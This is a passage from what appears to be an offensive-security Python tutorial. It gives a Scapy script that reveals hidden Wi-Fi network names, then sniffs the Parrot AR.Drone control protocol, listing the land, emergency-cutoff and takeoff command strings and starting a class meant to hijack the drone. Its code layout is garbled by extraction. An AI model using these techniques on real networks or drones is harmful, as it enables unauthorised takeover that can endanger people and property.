While the access point leaves the info field blank during the 802.11 Beacon Frame, it does transmit the name during the Probe Response. A Probe Response typically occurs after a client sends a Probe Request. To discover the hidden name, we must wait for a Probe Response that matches the same MAC address as our 802.11 Beacon frame. We can wrap this together in a short Python script using two arrays. The first, hiddenNets, keeps track of the unique MAC addresses for the hidden networks that we have seen. The second array, unhiddenNets, keeps track of networks we have decloaked. When we detect an 802.11 Beacon Frame with an empty network name, we can add it to our array of hidden networks. When we detect an 802.11 Probe Response, we will extract the network name. We can check the hiddenNets array to see if it contains this value, and the unhiddenNets to ensure it does not contain this value. If both conditions prove true, we can parse out the network name and print it to the screen.
import sys
from scapy.all import * interface = 'mon0' hiddenNets = []
unhiddenNets = []
def sniffDot11(p):
if p.haslayer(Dot11ProbeResp):
addr2 = p.getlayer(Dot11).addr2
if (addr2 in hiddenNets) & (addr2 not in unhiddenNets):
netName = p.getlayer(Dot11ProbeResp).info print '[+] Decloaked Hidden SSID: ' +\
netName + ' for MAC: ' + addr2 unhiddenNets.append(addr2)
if p.haslayer(Dot11Beacon):
if p.getlayer(Dot11Beacon).info == '':
addr2 = p.getlayer(Dot11).addr2 if addr2 not in hiddenNets:
print '[-] Detected Hidden SSID: ' +\
'with MAC:' + addr2 hiddenNets.append(addr2) sniff(iface=interface, prn=sniffDot11)
Running our hidden SSID decloaker script, we can see that it correctly identi-fies a hidden network and decloaks the name, all in less than 30 lines total
Intercepting and Spying on UAVs with Python 189
of code! Exciting! In the next section, we will transition to an active wireless attack—namely forging packets to takeover an unmanned aerial vehicle.
attacker:∼# python sniffHidden.py
[-] Detected Hidden SSID with MAC: 00:DE:AD:BE:EF:01
[+] Decloaked Hidden SSID: Secret-Net for MAC: 00:DE:AD:BE:EF:01
INTERCEPTING AND SPYING ON UAVS WITH PYTHON
In the summer of 2009, the US Military noticed something interesting in Iraq.
As the US fighters collected laptops from insurgent fighters, they discovered the laptops contained stolen video feeds from US aerial drones. The laptops con-tained hundreds of hours of proof that the drone feeds had been intercepted by insurgent fighters (Shane, 2009). After further investigation, intelligence officials discovered that the insurgents used a $26 commercial software pack-age called SkyGrabber to intercept the UAV feeds (SkyGrabber, 2011). Much to their surprise, Air Force officials with the UAV program revealed the unmanned aerial crafts sent the video over an unencrypted link to the ground control unit (McCullagh, 2009). The SkyGrabber software, commonly used to intercept unencrypted satellite television data, did not even require any reconfiguration to intercept the video feeds from the US unmanned aircrafts.
Attacking a US military drone most definitely violates some aspect of the Patriot Act, so let’s find a less illegal target to take down. The Parrot Ar.Drone UAV proves an excellent target. An open source and Linux-based UAV, the Par-rot Ar.Drone allows control via an iPhone/iPod application over unencrypted 802.11 Wi-Fi. Available for under $300, a hobbyist can purchase the UAV from http://ardrone.parrot.com/. With the tools we have already learned, we can take flight control over a target UAV.
Intercepting the Traffic, Dissecting the Protocol
Let’s first understand how the UAV and iPhone communicate. By placing a wireless adapter in monitor mode, we learn that the UAV and iPhone create an ad–hoc wireless network between each other. After reading the included instructions with the UAV, we learn that MAC filtering proves to be the only security mechanism protecting the connection. Only the paired iPhone can send flight navigation instructions to the UAV. In order to take over the drone, we need to learn the protocol for the instructions and then replay these instruc-tions as necessary.
First, we place our wireless network adapter into monitor mode to observe the traffic. A quick tcpdump shows UDP traffic originating from the UAV
and headed towards the phone on UDP port 5555. After a quick analysis, we can surmise that this traffic contains the UAV video download because of its large size and direction. In contrast, the navigation commands appear to come directly from the iPhone and head to UDP port 5556 on the UAV.
attacker# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
(monitor mode enabled on mon0) attacker# tcpdump-nn-i mon0
16:03:38.812521 54.0 Mb/s 2437 MHz 11g -59dB signal antenna 1 [bit 14]
IP 192.168.1.2.5556 > 192.168.1.1.5556: UDP, length 106
16:03:38.839881 54.0 Mb/s 2437 MHz 11g -57dB signal antenna 1 [bit 14]
IP 192.168.1.2.5556 > 192.168.1.1.5556: UDP, length 64
16:03:38.840414 54.0 Mb/s 2437 MHz 11g -53dB signal antenna 1 [bit 14]
IP 192.168.1.1.5555 > 192.168.1.2.5555: UDP, length 25824
With the knowledge that the iPhone sends UAV navigation controls to UDP port 5556, we can build a small Python script to parse out navigation traffic.
Notice that our script prints the raw contents of UDP traffic with the destina-tion port of 5556.
from scapy.all import * NAVPORT = 5556
def printPkt(pkt):
if pkt.haslayer(UDP) and pkt.getlayer(UDP).dport == NAVPORT:
raw = pkt.sprintf('%Raw.load%') print raw
conf.iface = 'mon0' sniff(prn=printPkt)
Running this script gives us our first glance into the navigation protocol for the UAV. We see that the protocol uses the syntax AT*CMD*=SEQUENCE_
NUMBER,VALUE,[VALUE{3}]. By recording traffic over a long period of time, we have learned three simple instructions that will prove valuable to us in our attack and are worth replaying. The command AT*REF=$SEQ, 290717696\r issues a command to land the UAV. Next, the command AT*REF=$SEQ,290717952\r, issues an emergency landing command, immedi-ately cutting off the UAVs engines. The command AT*REF=SEQ, 290718208\r issues a take-off instruction to the UAV. Finally, we can control motion with the command AT*PCMD=SEQ, Left_Right_Tilt, Front_Back_Tilt, Vertical_Speed,
Intercepting and Spying on UAVs with Python 191
Angular_Speed\r. We now know enough about the navigation control to mount an attack.
attacker# python uav-sniff.py 'AT*REF=11543,290718208\r'
'AT*PCMD=11542,1,-1364309249,988654145,1065353216,0\r' 'AT*REF=11543,290718208\r'
'AT*PCMD=11544,1,-1358634437,993342234,1065353216,0\rAT*PCMD=11545,1,-1355121202,998132864,1065353216,0\r'
'AT*REF=11546,290718208\r'
<..SNIPPED..>
Let’s begin by creating a Python class named interceptThread. This threaded class has the fields that store information for our attack. These fields contain the current intercepted packet, the specific UAV protocol sequence number, and finally a Boolean to describe if the UAV traffic has been intercepted. After initializing these fields, we will create two methods called run() and intercept-Pkt(). The run() method starts a sniffer filtered by UDP and port 5556, which triggers the interceptPkt() method. Upon the first interception of the UAV traf-fic, this method changes the value of the Boolean to true. Next, it will strip the sequence number from the current UAV command and record the current packet.
class interceptThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self) self.curPkt = None
self.seq = 0
self.foundUAV = False def run(self):
sniff(prn=self.interceptPkt, filter='udp port 5556') def interceptPkt(self, pkt):
if self.foundUAV == False:
print '[*] UAV Found.' self.foundUAV = True self.curPkt = pkt
raw = pkt.sprintf('%Raw.load%') try:
self.seq = int(raw.split(',')[0].split('=')[-1]) + 5 except:
self.seq = 0